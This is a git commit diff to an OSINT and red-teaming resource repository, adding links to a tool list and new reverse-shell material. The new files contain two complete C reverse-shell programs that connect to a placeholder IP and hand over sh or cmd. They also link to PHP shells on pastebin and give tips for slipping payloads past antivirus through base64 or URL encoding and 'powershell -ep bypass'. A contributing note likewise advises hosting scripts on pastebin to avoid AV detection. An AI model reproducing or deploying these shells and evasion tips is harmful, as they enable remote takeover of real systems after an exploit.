added resouces and scripts

This commit is contained in:
Jieyab89
2024-12-24 01:20:12 +07:00
parent 1b25a26a12
commit 65ca7c484e
8 changed files with 136 additions and 4 deletions

View File

@@ -151,6 +151,7 @@ Be carefull using this tool
- [Hoaxy](https://hoaxy.osome.iu.edu/)
- [Offensive OSINT](https://www.os-surveillance.io/#choose-plan)
- [botsentinel](https://botsentinel.com/dashboard)
- [keyhole](https://keyhole.co/)
# Collection Dataset
@@ -194,6 +195,7 @@ Be carefull using this tool
- [BNN ID](https://puslitdatin.bnn.go.id/portfolio/data-statistik-kasus-narkoba/)
- [Microsoft Building Dataset](https://planetarycomputer.microsoft.com/dataset/ms-buildings)
- [huggingface](https://huggingface.co/)
- [goodstats ID](https://goodstats.id/)
# Forums & Sites
@@ -330,6 +332,7 @@ Site and forums OSINT community arround world
Hastag and keyword analysis in search engine, social media or other platform (Text Intel)
- [keyhole](https://keyhole.co/)
- [brandmentions](https://app.brandmentions.com/)
- [wordtracker](https://www.wordtracker.com/)
- [keywordtool](https://keywordtool.io/)
@@ -2178,7 +2181,7 @@ Browser plugin that allows you to watch YouTube videos frame by frame.
- [unwiredlabs](https://unwiredlabs.com/products)
- [copernix](https://copernix.io/)
- [skydb DB for building](https://www.skydb.net/)
- [dataspace](https://browser.dataspace.copernicus.eu/)
- [dataspace copernicus EU](https://browser.dataspace.copernicus.eu/)
- [openinframap](https://openinframap.org/#2/57.92/72.82/L,O)
- [openseamap](https://map.openseamap.org/)
- [openstreetbrowser](https://openstreetbrowser.org/)
@@ -2689,6 +2692,7 @@ Social Network and blogging
- [immuniweb](https://www.immuniweb.com/darkweb/)
- [darknetlive](https://darknetlive.com/onions)
- [ransomwatch](https://ransomwatch.telemetry.ltd/#/)
- [watchguard ransomtracker](https://www.watchguard.com/wgrd-security-hub/ransomware-tracker)
- [Ahmia Onion Site](http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/)
- [Haystak Onion Site](http://haystak5njsmn2hqkewecpaxetahtwhsbsa64jom2k22z5afxhnpxfid.onion/)
- [Dark Search Onion Site](http://darkschn4iw2hxvpv2vy2uoxwkvs2padb56t3h4wqztre6upoc5qwgid.onion)
@@ -3585,6 +3589,7 @@ Awesome Burpsuite Extension
C2 & C4
- [cobaltstrike](https://www.cobaltstrike.com/)
- [bruteratel C4](https://bruteratel.com/tabs/tutorials/)
- [Ninja](https://github.com/ahmedkhlief/Ninja)
- [Poweshell Empire](https://bc-security.gitbook.io/empire-wiki)
- [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
@@ -3857,6 +3862,7 @@ Resources and collection for your make tool OSINT
# OSINT Branding & Verify
- [keyhole](https://keyhole.co/)
- [Trus Pilot](https://www.trustpilot.com/)
- [Google Alert](https://www.google.com/alerts)
- [White Pages](https://www.whitepages.com/)

View File

@@ -4,7 +4,7 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it 3.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
## Script 1

View File

@@ -0,0 +1,84 @@
# TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
5. Check the compiler
## C script spawning shell
``` Linux
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"sh", NULL};
execvp("sh", argv);
return 0;
}
```
## C spawning cmd
```Windows
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"cmd", NULL};
execvp("cmd", argv);
return 0;
}
```
*Pro tips
- If you was gett the shell, change to powershell, you can run
```
powershell -ep bypass
```

View File

@@ -0,0 +1,21 @@
# TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
5. Check the compiler
## Php spawning cmd
```Windows
https://pastebin.com/bFqVuGwv
```
## Php spawning bash
```Linux
https://pastebin.com/QsSKm2F1
```

View File

@@ -4,8 +4,9 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it 3.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
5. Check the compiler
## Script 1

View File

@@ -1,3 +1,16 @@
# Red Teaming
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
## Tips Reverse Shell
1. Check the operating system target
2. Check the network or internet access on the target (internet access opened)
3. Cehck the vuln, you can check it by run the command like sleep, delay or trying to wget on your local machine
4. Check is it a sandbox like in a container? Or directly to the operating system. If it's a container then you have to bypass
5. Check the installed software on the target
6. Check the compiler on the target
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
8. Change the port listener to bigger
## Soon will added (tamplate )

View File

@@ -1,6 +1,7 @@
# Awesome Collection Sentinel Script
- [sentinel collection script](https://custom-scripts.sentinel-hub.com/)
- [sentinel custom script Github](https://github.com/sentinel-hub/custom-scripts)
# Guide

View File

@@ -48,6 +48,10 @@ If you want change the repo for web based and create like node, data list, searc
# Script
## Readme
*Notes for script: To avoid AV detection and abusive access to your computer, you can publish your scripts via pastebin, ghostbin or others.
## Format
- Decide what script you're creating and what it's for.
@@ -67,3 +71,5 @@ Red Team - Python Scripts
>
or you can also create new folder on this script path
*Notes for script: To avoid AV detection and abusive access to your computer, you can publish your scripts via pastebin, ghostbin or others.